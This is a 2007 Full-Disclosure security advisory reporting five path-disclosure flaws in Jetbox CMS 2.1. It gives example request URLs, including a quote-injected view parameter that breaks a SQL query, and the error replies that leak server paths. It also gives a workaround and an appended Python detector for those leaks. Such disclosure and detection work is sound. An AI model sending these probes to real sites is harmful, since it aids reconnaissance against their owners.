
List:       full-disclosure
Subject:    [Full-disclosure] Jetbox CMS version 2.1 Multiple Path Disclosure
From:       "SecurityResearch" <securityresearch () netvigilance ! com>
Date:       2007-05-21 10:35:32
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A553 () beaverton ! portland ! local

netVigilance Security Advisory #27
Jetbox CMS version 2.1 Multiple Path Disclosure Vulnerabilities
Description:
Jetbox CMS is seriously tested on usability & has a professional intuitive interface. The system is role based, with workflow and module orientated. All content is fully separated from layout. It uses php & mysql.
External References: 
Mitre CVE: CVE-2007-2684
NVD NIST: CVE-2007-2684
OSVDB: 34783
Summary: 
Jetbox CMS is seriously tested on usability & has a professional intuitive interface. 
Security problems in the product allow attackers to gather the true path of the server-side script.
Advisory URL: 
http://www.netvigilance.com/advisory0027
Release Date:
05/21/2007
Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
 
Vulnerable Systems:
Jetbox CMS version 2.1
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.
Vendor: 
Streamedge Consultancy & Development
Vendor Status: 
Contact with the Vendor was established. The vendor refused to fix the issue and said that Jetbox is no longer maintained. There is no official fix at the release of this Security Advisory.
Workaround:
Disable warning messages: in the php.ini file, set the following line: display_errors = Off. Use .htaccess directives to deny access to these files (works only for Apache).
Example: 
Path Disclosure Vulnerability 1
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/main_page.php
REPLY:
...<b>Fatal error</b>:  Call to a member function on a non-object in <b>[SERVER PATH][JETBOX-DIRECTORY]\main_page.php</b> on line <b>7</b><br />...
Path Disclosure Vulnerability 2
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/open_tree.php
REPLY:
...<b>Fatal error</b>:  Call to a member function on a non-object in <b>[SERVER PATH][JETBOX-DIRECTORY]\open_tree.php</b> on line <b>12</b><br />...
Path Disclosure Vulnerability 3
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/outputs.php
REPLY:
...<b>Fatal error</b>:  Call to a member function on a non-object in <b>[SERVER PATH][JETBOX-DIRECTORY]\open_tree.php</b> on line <b>12</b><br />...
Path Disclosure Vulnerability 4
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/?view='%20AND
REPLY:
...q: SELECT * FROM navigation WHERE view_name='' AND'<br /> Line: 146 <br/>File: [SERVER PATH][JETBOX-DIRECTORY]index.php...
Path Disclosure Vulnerability 5
REQUEST:
http://[TARGET]/[JETBOX-DIRECTORY]/admin/cms/opentree.php?task=editrecord&id[]=42
REPLY:
...<b>Fatal error</b>:  Unsupported operand types in <b>[SERVER PATH][JETBOX-DIRECTORY]\includes\jetstream_core_one.inc.php</b> on line <b>110</b><br />...
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
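
Added example, not part of the netVigilance advisory: a Python check that scans saved HTTP response bodies for the two leak formats shown in the REPLY samples above, so an administrator can confirm the workaround took effect on their own install. The function names and the sample install path C:\www\jetbox\ are assumptions made for this sketch.

```python
import re

# PHP's HTML error format, as in replies 1, 2, 3 and 5 of the advisory.
PHP_ERROR = re.compile(
    r"<b>(?P<level>Fatal error|Parse error|Warning|Notice)</b>:\s*(?P<msg>.*?)"
    r" in <b>(?P<path>[^<]+)</b> on line <b>(?P<line>\d+)</b>",
    re.DOTALL,
)
# Query-debug format from reply 4: "... Line: 146 <br/>File: <path>index.php".
APP_DEBUG = re.compile(
    r"Line:\s*(?P<line>\d+)\s*<br\s*/?>\s*File:\s*(?P<path>[^<\r\n]+?\.php)",
    re.IGNORECASE,
)

def find_path_disclosures(body):
    """Return one dict per server path leaked in an HTTP response body."""
    findings = []
    for kind, pattern in (("php-error", PHP_ERROR), ("app-debug", APP_DEBUG)):
        for m in pattern.finditer(body):
            findings.append({"kind": kind, "path": m.group("path").strip(),
                             "line": int(m.group("line"))})
    return findings

def leaking_urls(responses):
    """Given {url: body}, return the sorted URLs whose body still leaks a path."""
    return sorted(url for url, body in responses.items()
                  if find_path_disclosures(body))

# Constructed sample bodies; C:\www\jetbox\ is a made-up install path.
SAMPLES = {
    "http://[TARGET]/[JETBOX-DIRECTORY]/main_page.php":
        r"...<b>Fatal error</b>:  Call to a member function on a non-object in "
        r"<b>C:\www\jetbox\main_page.php</b> on line <b>7</b><br />...",
    "http://[TARGET]/[JETBOX-DIRECTORY]/?view='%20AND":
        r"...q: SELECT * FROM navigation WHERE view_name='' AND'<br /> Line: 146 "
        r"<br/>File: C:\www\jetbox\index.php...",
    # What a request should return once errors are no longer displayed.
    "http://[TARGET]/[JETBOX-DIRECTORY]/open_tree.php": "",
}

if __name__ == "__main__":
    for url in leaking_urls(SAMPLES):
        for f in find_path_disclosures(SAMPLES[url]):
            print(f"{url}: {f['kind']} leaks {f['path']} (line {f['line']})")
```

An empty result from leaking_urls() for bodies captured after the change means neither format is still being returned to clients.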

